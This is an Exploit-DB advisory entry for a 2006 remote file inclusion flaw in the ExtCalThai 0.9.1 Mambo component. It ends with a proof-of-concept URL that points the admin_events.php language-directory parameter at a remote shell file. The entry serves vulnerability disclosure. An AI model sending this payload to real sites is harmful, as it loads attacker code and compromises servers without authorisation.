MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXTLANGUAGES_DIR Parameter Remote File Inclusion

2006-10-12T00:00:00
ID EDB-ID:28792
Type exploitdb
Reporter k1tk4t
Modified 2006-10-12T00:00:00

Description

MamboLaiThai ExtCalThai 0.9.1 admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion. CVE-2006-6634. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20487/info

ExtCalThai is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

ExtCalThai 0.9.1 and prior verions are vulnerable; other versions may also be affected.

http://www.example.com/MamboV4.6RC2/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shell/cmd.gif?